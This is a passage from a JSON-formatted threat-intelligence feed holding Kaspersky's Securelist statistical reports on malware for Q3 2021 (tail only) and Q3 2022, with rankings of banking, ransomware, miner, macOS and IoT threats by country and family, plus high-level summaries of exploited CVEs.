users (under 10,000). \n** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151433/15-en-malware-report-q3-2021-pc-graphs.png>))_\n\nOn average worldwide, **Malware-class** local threats were recorded on 15.14% of users' computers at least once during the quarter. Russia scored 14.64% in this rating.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-26T12:00:36", "type": "securelist", "title": "IT threat evolution in Q3 2021. PC statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2019-7481", "CVE-2021-1640", "CVE-2021-1675", "CVE-2021-22937", "CVE-2021-26084", "CVE-2021-26878", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31195", "CVE-2021-31196", "CVE-2021-31207", "CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34483", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-36934", "CVE-2021-36936", "CVE-2021-36947", "CVE-2021-36958", "CVE-2021-40444"], "modified": "2021-11-26T12:00:36", "id": "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "href": "https://securelist.com/it-threat-evolution-in-q3-2021-pc-statistics/104982/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-30T12:08:22", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/17134132/abstract_binary_brain_report-990x400.jpg)\n\n * [IT threat evolution in Q3 2022](<https://securelist.com/it-threat-evolution-q3-2022/107957/>)\n * **IT threat evolution in Q3 2022. Non-mobile statistics**\n * [IT threat evolution in Q3 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2022-mobile-statistics/107978/>)\n\n_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q3 2022:\n\n * Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe.\n * Web Anti-Virus recognized 251,288,987 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 99,989 unique users.\n * Ransomware attacks were defeated on the computers of 72,941 unique users.\n * Our File Anti-Virus detected 49,275,253 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Number of users attacked by banking malware\n\nIn Q3 2022, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 99,989 unique users.\n\n_Number of unique users attacked by financial malware, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154318/01-en-malware-report-q3-2022-pc-stat.png>))_\n\n### TOP 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 33.2 \n2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 15.2 \n3 | IcedID | Trojan-Banker.Win32.IcedID | 10.0 \n4 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 5.8 \n5 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 5.8 \n6 | SpyEye | Trojan-Spy.Win32.SpyEye | 2.1 \n7 | RTM | Trojan-Banker.Win32.RTM | 1.9 \n8 | Danabot | Trojan-Banker.Win32.Danabot | 1.4 \n9 | Tinba/TinyBanker | Trojan-Banker.Win32.Tinba | 1.4 \n10 | Gozi | Trojan-Banker.Win32.Gozi | 1.1 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n### Geography of financial malware attacks\n\n**TOP 10 countries and territories by share of attacked users**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Turkmenistan | 4.7 \n2 | Afghanistan | 4.6 \n3 | Paraguay | 2.8 \n4 | Tajikistan | 2.8 \n5 | Yemen | 2.3 \n6 | Sudan | 2.3 \n7 | China | 2.0 \n8 | Switzerland | 2.0 \n9 | Egypt | 1.9 \n10 | Venezuela | 1.8 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000). \n** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\nThe third quarter of 2022 saw the builder for LockBit, a well-known ransomware, [leaked online](<https://www.bleepingcomputer.com/news/security/lockbit-ransomware-builder-leaked-online-by-angry-developer-/>). LockBit themselves attributed the leakage to one of their developers' personal initiative, not the group's getting hacked. One way or another, the LockBit 3.0 build kit is now accessible to the broader cybercriminal community. Similarly to other ransomware families in the past, such as Babuk and Conti, Trojan builds generated with the leaked builder began to serve other groups unrelated to LockBit. One example was Bloody/Bl00dy [spotted back in May](<https://www.bleepingcomputer.com/news/security/leaked-lockbit-30-builder-used-by-bl00dy-ransomware-gang-in-attacks/>). A borrower rather than a creator, this group added the freshly available LockBit to its arsenal in September 2022.\n\nMass attacks on NAS (network attached storage) devices continue. QNAP issued warnings about Checkmate and Deadbolt infections in Q3 2022. The [former](<https://www.qnap.com/en/security-advisory/QSA-22-21>) threatened files accessible from the internet over SMB protocol and protected by a weak account password. The latter [attacked](<https://www.qnap.com/en/security-news/2022/take-immediate-action-to-update-photo-station-to-the-latest-available-version>) devices that had a vulnerable version of the Photo Station software installed. Threats that target NAS remain prominent, so we recommend keeping these devices inaccessible from the internet to ensure maximum safety of your data.\n\nThe United States Department of Justice [announced](<https://www.justice.gov/opa/pr/justice-department-seizes-and-forfeits-approximately-500000-north-korean-ransomware-actors>) that it had teamed up with the FBI to seize about $500,000 paid as ransom after a Maui ransomware attack. The Trojan was likely [used](<https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/>) by the North Korean operators Andariel. The DOJ said victims had started getting their money back.\n\nThe creators of the little-known AstraLocker and Yashma ransomware [published](<https://www.bleepingcomputer.com/news/security/astralocker-ransomware-shuts-down-and-releases-decryptors/>) decryptors and stopped spreading both of them. The hackers provided no explanation for the move, but it appeared to be related to an increase in media coverage.\n\n### Number of new modifications\n\nIn Q3 2022, we detected 17 new ransomware families and 14,626 new modifications of this malware type. More than 11,000 of those were assigned the verdict of Trojan-Ransom.Win32.Crypmod, which hit the sixth place in our rankings of the most widespread ransomware Trojans.\n\n_Number of new ransomware modifications, Q3 2021 \u2014 Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154421/03-en-ru-es-malware-report-q3-2022-pc-stat.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q3 2022, Kaspersky products and technologies protected 72,941 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154500/04-en-malware-report-q3-2022-pc-stat.png>))_\n\n**TOP 10 most common families of ransomware Trojans**\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 14.76 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.12 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 11.68 \n4 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 6.59 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.53 \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypmod \n7 | Magniber | Trojan-Ransom.Win64.Magni | 4.93 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 4.84 \n9 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 4.35 \n10 | Hive | Trojan-Ransom.Win32.Hive | 3.87 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n### Geography of attacked users\n\n**TOP 10 countries and territories attacked by ransomware Trojans**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.66 \n2 | Yemen | 1.30 \n3 | South Korea | 0.98 \n4 | Taiwan | 0.77 \n5 | Mozambique | 0.64 \n6 | China | 0.52 \n7 | Colombia | 0.43 \n8 | Nigeria | 0.40 \n9 | Pakistan | 0.39 \n10 | Venezuela | 0.32 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). \n** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 14.76 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.12 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 11.68 \n4 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 6.59 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.53 \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 5.46 \n7 | Magniber | Trojan-Ransom.Win64.Magni | 4.93 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 4.84 \n9 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 4.35 \n10 | Hive | Trojan-Ransom.Win32.Hive | 3.87 \n \n_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to providing statistical data. \n** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q3 2022, Kaspersky systems detected 153,773 new miner mods. More than 140,000 of these were found in July and August; combined with June's figure of more than 35,000, this suggests that miner creators kept themselves abnormally busy this past summer.\n\n_Number of new miner modifications, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154533/06-en-malware-report-q3-2022-pc-stat.png>))_\n\n### Number of users attacked by miners\n\nIn Q3, we detected attacks that used miners on the computers of 432,363 unique users of Kaspersky products worldwide. A quieter period from late spring through the early fall was followed by another increase in activity.\n\n_Number of unique users attacked by miners, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154601/07-en-malware-report-q3-2022-pc-stat.png>))_\n\n### Geography of miner attacks\n\n**TOP 10 countries and territories attacked by miners**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Ethiopia | 2.38 \n2 | Kazakhstan | 2.13 \n3 | Uzbekistan | 2.01 \n4 | Rwanda | 1.93 \n5 | Tajikistan | 1.83 \n6 | Venezuela | 1.78 \n7 | Kyrgyzstan | 1.73 \n8 | Mozambique | 1.57 \n9 | Tanzania | 1.56 \n10 | Ukraine | 1.54 \n \n_* Excluded are countries and territories with relatively few users of Kaspersky products (under 50,000). \n** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by criminals during cyberattacks\n\n### Quarterly highlights\n\nQ3 2022 was remembered for a series of vulnerabilities discovered in various software products. Let's begin with Microsoft Windows and some of its components. Researchers found new vulnerabilities that affected the CLFS driver: [CVE-2022-30220](<https://nvd.nist.gov/vuln/detail/CVE-2022-30220>), along with [CVE-2022-35803](<https://nvd.nist.gov/vuln/detail/CVE-2022-35803>) and [CVE-2022-37969](<https://nvd.nist.gov/vuln/detail/CVE-2022-37969>), both encountered in the wild. By manipulating Common Log File System data in a specific way, an attacker can make the kernel write their own data to arbitrary memory addresses, allowing cybercriminals to hijack kernel control and elevate their privileges in the system. Several vulnerabilities were discovered in the Print Spooler service: [CVE-2022-22022](<https://nvd.nist.gov/vuln/detail/CVE-2022-22022>), [CVE-2022-30206](<https://nvd.nist.gov/vuln/detail/CVE-2022-30206>), and [CVE-2022-30226](<https://nvd.nist.gov/vuln/detail/CVE-2022-30226>). These allow elevating the system privileges through a series of manipulations while installing a printer. Serious vulnerabilities were also discovered in the Client/Server Runtime Subsystem (CSRSS), an essential Windows component. Some of these can be exploited for privilege escalation ([CVE-2022-22047](<https://nvd.nist.gov/vuln/detail/CVE-2022-22047>), [CVE-2022-22049](<https://nvd.nist.gov/vuln/detail/CVE-2022-22049>), and [CVE-2022-22026](<https://nvd.nist.gov/vuln/detail/CVE-2022-22026>)), while [CVE-2022-22038](<https://nvd.nist.gov/vuln/detail/CVE-2022-22038>) affects remote procedure call (RPC) protocol, allowing an attacker to execute arbitrary code remotely. A series of critical vulnerabilities were discovered in the graphics subsystem, including [CVE-2022-22034](<https://nvd.nist.gov/vuln/detail/CVE-2022-22034>) and [CVE-2022-35750](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35750>), which can also be exploited for privilege escalation. Note that most of the above vulnerabilities require that exploits entrench in the system before an attacker can run their malware. The Microsoft Support Diagnostic Tool (MSDT) was found to contain a further two vulnerabilities, [CVE-2022-34713](<https://nvd.nist.gov/vuln/detail/CVE-2022-34713>) and [CVE-2022-35743](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35743>), which can be exploited to take advantage of security flaws in the link handler to remotely run commands in the system.\n\nMost of the network threats detected in Q3 2022 were again attacks associated with [brute-forcing](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) passwords for Microsoft SQL Server, RDP, and other services. Network attacks on vulnerable versions of Windows via EternalBlue, EternalRomance, and other exploits were still common. The attempts at exploiting network services and other software via vulnerabilities in the Log4j library ([CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), [CVE-2021-44832](<https://nvd.nist.gov/vuln/detail/CVE-2021-44832>), [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>), and [CVE-2021-45105](<https://nvd.nist.gov/vuln/detail/cve-2021-45105>)) also continued. Several vulnerabilities were found in the Microsoft Windows Network File System (NFS) driver. These are [CVE-2022-22028](<https://nvd.nist.gov/vuln/detail/CVE-2022-22028>), which can lead to leakage of confidential information, as well as [CVE-2022-22029](<https://nvd.nist.gov/vuln/detail/CVE-2022-22029>), [CVE-2022-22039](<https://nvd.nist.gov/vuln/detail/CVE-2022-22039>) and [CVE-2022-34715](<https://nvd.nist.gov/vuln/detail/CVE-2022-34715>), which a cybercriminal can use to remotely execute arbitrary code in the system \u2014 in kernel context \u2014 by using a specially crafted network packet. The TCP/IP stack was found to contain the critical vulnerability [CVE-2022-34718](<https://nvd.nist.gov/vuln/detail/CVE-2022-34718>), which allows in theory to remotely exploit a target system by taking advantage of errors in the IPv6 protocol handler. Finally, it is worth mentioning the [CVE-2022-34724](<https://nvd.nist.gov/vuln/detail/CVE-2022-34724>) vulnerability, which affects Windows DNS Server and can lead to denial of service if exploited.\n\nTwo vulnerabilities in Microsoft Exchange Server, [CVE-2022-41040](<https://nvd.nist.gov/vuln/detail/CVE-2022-41040>) and [CVE-2022-41082](<https://nvd.nist.gov/vuln/detail/CVE-2022-41082>), received considerable media coverage. They were collectively dubbed "ProxyNotShell" in reference to the ProxyShell vulnerabilities with similar exploitation technique (they were closed earlier). Researchers discovered the ProxyNotShell exploits while investigating an APT attack: an authenticated user can use the loopholes to elevate their privileges and run arbitrary code on an MS Exchange server. As a result, the attacker can steal confidential data, encrypt critical files on the server to to extort money from the victim, etc.\n\n### Vulnerability statistics\n\nIn Q3 2022, malicious Microsoft Office documents again accounted for the greatest number of detections \u2014 80% of the exploits we discovered, although the number decreased slightly compared to Q2. Most of these detections were triggered by exploits that targeted the following vulnerabilities:\n\n * [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), in the Equation Editor component, which allow corrupting the application memory when processing formulas, and subsequently running arbitrary code in the system;\n * [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>), which allows downloading and running malicious script files;\n * [CVE-2022-30190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30190>), also known as "Follina", which exploits a flaw in the Microsoft Windows Support Diagnostic Tool (MSDT) for running arbitrary programs in a vulnerable system even in Protected Mode or when macros are disabled;\n * [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>), which allows an attacker to deploy malicious code using a special ActiveX template due to inadequate input validation.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154631/09-en-malware-report-q3-2022-pc-stat.png>))_\n\nThese were followed by exploits that target browsers. Their share amounted to 6%, or 1% higher than in Q2. We will list the most serious vulnerabilities, all of them targeting Google Chrome:\n\n * [CVE-2022-2294](<https://nvd.nist.gov/vuln/detail/CVE-2022-2294>), in the WebRTC component, which leads to buffer overflow;\n * [CVE-2022-2624](<https://nvd.nist.gov/vuln/detail/CVE-2022-2624>), which exploits a memory overflow error in the PDF viewing component;\n * [CVE-2022-2295](<https://nvd.nist.gov/vuln/detail/CVE-2022-2295>), a Type Confusion error that allows an attacker to corrupt the browser process memory remotely and run arbitrary code in a sandbox;\n * [CVE-2022-3075](<https://nvd.nist.gov/vuln/detail/CVE-2022-3075>), an error linked to inadequate input validation in the Mojo interprocess communication component in Google Chromium-based browsers that allows escaping the sandbox and running arbitrary commands in the system.\n\nSince many modern browsers are based on Google Chromium, attackers can often take advantage of the shared vulnerabilities to attack the other browsers as long as they run on one engine.\n\nA series of vulnerabilities were identified in Microsoft Edge. Worth noting is [CVE-2022-33649](<https://nvd.nist.gov/vuln/detail/CVE-2022-33649>), which allows running an application in the system by circumventing the browser protections; [CVE-2022-33636](<https://nvd.nist.gov/vuln/detail/CVE-2022-33636>) and [CVE-2022-35796](<https://nvd.nist.gov/vuln/detail/CVE-2022-35796>), Race Condition vulnerabilities that ultimately allow a sandbox escape; and [CVE-2022-38012](<https://nvd.nist.gov/vuln/detail/CVE-2022-38012>), which exploits an application memory corruption error, with similar results.\n\nThe Mozilla Firefox browser was found to contain vulnerabilities associated with memory corruption, which allow running arbitrary code in the system: [CVE-2022-38476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38476>), a Race Condition vulnerability that leads to a subsequent Use-After-Free scenario, and the similar vulnerabilities [CVE-2022-38477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38477>) and [CVE-2022-38478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38478>), which exploit memory corruption. As you can see from our reports, browsers are an attractive target for cybercriminals, as these are widely used and allow attackers to infiltrate the system remotely and virtually unbeknownst to the user. That said, browser vulnerabilities are not simple to exploit, as attackers often have to use a chain of vulnerabilities to work around the protections of modern browsers.\n\nThe remaining positions in our rankings were distributed among Android (5%) and Java (4%) exploits. The fifth-highest number of exploits (3%) targeted Adobe Flash, a technology that is obsolete but remains in use. Rounding out the rankings with 2% were exploits spread through PDF documents.\n\n## Attacks on macOS\n\nThe third quarter of 2022 brought with it a significant number of interesting macOS malware discoveries. In particular, researchers found [Operation In(ter)ception](<https://www.sentinelone.com/blog/lazarus-operation-interception-targets-macos-users-dreaming-of-jobs-in-crypto/>), a campaign operated by North Korean Lazarus group, which targets macOS users looking for cryptocurrency jobs. The malware was disguised as documents containing summaries of positions at Coinbase and Crypto.com.\n\n[CloudMensis](<https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/>), a spy program written in Objective-C, used cloud storage services as C&C servers and [shared several characteristics](<https://twitter.com/ESETresearch/status/1575103839115804672>) with the RokRAT Windows malware operated by ScarCruft.\n\nThe creators of XCSSET [adapted](<https://www.sentinelone.com/blog/xcsset-malware-update-macos-threat-actors-prepare-for-life-without-python/>) their toolset to macOS Monterey and migrated from Python 2 to Python 3.\n\nIn Q3, cybercrooks also began to make use of open-source tools in their attacks. July saw the discovery of two campaigns that used a fake [VPN application](<https://www.sentinelone.com/blog/from-the-front-lines-new-macos-covid-malware-masquerades-as-apple-wears-face-of-apt/>) and fake [Salesforce updates](<https://twitter.com/ESETresearch/status/1547943014860894210>), both built on the Sliver framework.\n\nIn addition to this, researchers announced a new multi-platform [find](<https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/>): the LuckyMouse group (APT27 / Iron Tiger / Emissary Panda) attacked Windows, Linux, and macOS users with a malicious mod of the Chinese MiMi instant messaging application.\n\n### TOP 20 threats for macOS\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Amc.e | 14.77 \n2 | AdWare.OSX.Pirrit.ac | 10.45 \n3 | AdWare.OSX.Agent.ai | 9.40 \n4 | Monitor.OSX.HistGrabber.b | 7.15 \n5 | AdWare.OSX.Pirrit.j | 7.10 \n6 | AdWare.OSX.Bnodlero.at | 6.09 \n7 | AdWare.OSX.Bnodlero.ax | 5.95 \n8 | Trojan-Downloader.OSX.Shlayer.a | 5.71 \n9 | AdWare.OSX.Pirrit.ae | 5.27 \n10 | Trojan-Downloader.OSX.Agent.h | 3.87 \n11 | AdWare.OSX.Bnodlero.bg | 3.46 \n12 | AdWare.OSX.Pirrit.o | 3.32 \n13 | AdWare.OSX.Agent.u | 3.13 \n14 | AdWare.OSX.Agent.gen | 2.90 \n15 | AdWare.OSX.Pirrit.aa | 2.85 \n16 | Backdoor.OSX.Twenbc.e | 2.85 \n17 | AdWare.OSX.Ketin.h | 2.82 \n18 | AdWare.OSX.Pirrit.gen | 2.69 \n19 | Trojan-Downloader.OSX.Lador.a | 2.52 \n20 | Downloader.OSX.InstallCore.ak | 2.28 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nAs usual, our TOP 20 ranking for biggest threats encountered by users of Kaspersky security solutions for macOS were dominated by adware. AdWare.OSX.Amc.e, touted as "Advanced Mac Cleaner," had taken the top place for a second quarter in a row. This application displays fake system issue messages, offering to buy the full version to fix those. Second and third places went to members of the AdWare.OSX.Pirrit and AdWare.OSX.Agent families.\n\n### Geography of threats for macOS\n\n**TOP 10 countries and territories by share of attacked users**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | France | 1.71 \n2 | Canada | 1.70 \n3 | Russia | 1.57 \n4 | India | 1.53 \n5 | United States | 1.52 \n6 | Spain | 1.48 \n7 | Australia | 1.36 \n8 | Italy | 1.35 \n9 | Mexico | 1.27 \n10 | United Kingdom | 1.24 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000). \n** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nFrance, with 1.71%, was again the most attacked country by number of users. Canada, with 1.70%, and Russia, with 1.57%, followed close behind. The most frequently encountered family in France and Canada was AdWare.OSX.Amc.e, and in Russia, it was AdWare.OSX.Pirrit.ac.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q3 2022, three-fourths of the devices that attacked Kaspersky honeypots used the Telnet protocol.\n\nTelnet | 75.92% \n---|--- \nSSH | 24.08% \n \n_Distribution of attacked services by number of unique IP addresses of attacking devices, Q3 2022_\n\nA majority of the attacks on Kaspersky honeypots in terms of sessions were controlled via Telnet as well.\n\nTelnet | 97.53% \n---|--- \nSSH | 2.47% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2022_\n\n**TOP 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 28.67 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 18.63 \n3 | Backdoor.Linux.Mirai.ba | 11.63 \n4 | Backdoor.Linux.Mirai.cw | 10.94 \n5 | Backdoor.Linux.Gafgyt.a | 3.69 \n6 | Backdoor.Linux.Mirai.ew | 3.49 \n7 | Trojan-Downloader.Shell.Agent.p | 2.56 \n8 | Backdoor.Linux.Gafgyt.bj | 1.63 \n9 | Backdoor.Linux.Mirai.et | 1.17 \n10 | Backdoor.Linux.Mirai.ek | 1.08 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nDetailed IoT-threat statistics are published in the DDoS report for Q3 2022.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create these sites on purpose; they can infect hacked legitimate resources as well as web resources with user-created content, such as forums._\n\n### Countries and territories that serve as sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country or territory of the sources of internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q3 2022, Kaspersky solutions blocked 956,074,958 attacks launched from online resources across the globe. A total of 251,288,987 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources country and territory, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154703/11-en-malware-report-q3-2022-pc-stat.png>))_\n\n### Countries and territories where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries and territories, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.\n\nNote that these rankings only include attacks by malicious objects that fall under the **_Malware_**_ class_; they do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Taiwan | 19.65 \n2 | Belarus | 17.01 \n3 | Serbia | 15.05 \n4 | Russia | 14.12 \n5 | Algeria | 14.01 \n6 | Turkey | 13.82 \n7 | Tunisia | 13.31 \n8 | Bangladesh | 13.30 \n9 | Moldova | 13.22 \n10 | Palestine | 12.61 \n11 | Yemen | 12.58 \n12 | Ukraine | 12.25 \n13 | Libya | 12.23 \n14 | Sri Lanka | 11.97 \n15 | Kyrgyzstan | 11.69 \n16 | Estonia | 11.65 \n17 | Hong Kong | 11.52 \n18 | Nepal | 11.52 \n19 | Syria | 11.39 \n20 | Lithuania | 11.33 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware**-class attacks as a percentage of all unique users of Kaspersky products in the country._\n\nOn average during the quarter, 9.08% of internet users' computers worldwide were subjected to at least one **Malware**-class web attack.\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules of Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q3 2022, our File Anti-Virus detected **49,275,253** malicious and potentially unwanted objects.\n\n### Countries and territories where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThese rankings only include attacks by malicious programs that fall under the **Malware** class; they do not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Turkmenistan | 46.48 \n2 | Yemen | 45.12 \n3 | Afghanistan | 44.18 \n4 | Cuba | 40.48 \n5 | Tajikistan | 39.17 \n6 | Bangladesh | 37.06 \n7 | Uzbekistan | 37.00 \n8 | Ethiopia | 36.96 \n9 | South Sudan | 36.89 \n10 | Myanmar | 36.64 \n11 | Syria | 34.82 \n12 | Benin | 34.56 \n13 | Burundi | 33.91 \n14 | Tanzania | 33.05 \n15 | Rwanda | 33.03 \n16 | Chad | 33.01 \n17 | Venezuela | 32.79 \n18 | Cameroon | 32.30 \n19 | Sudan | 31.93 \n20 | Malawi | 31.88 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware**-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\nOn average worldwide, Malware-class local threats were registered on 14.74% of users' computers at least once during Q3. Russia scored 16.60% in this ranking.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-18T08:10:34", "type": "securelist", "title": "IT threat evolution in Q3 2022. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": 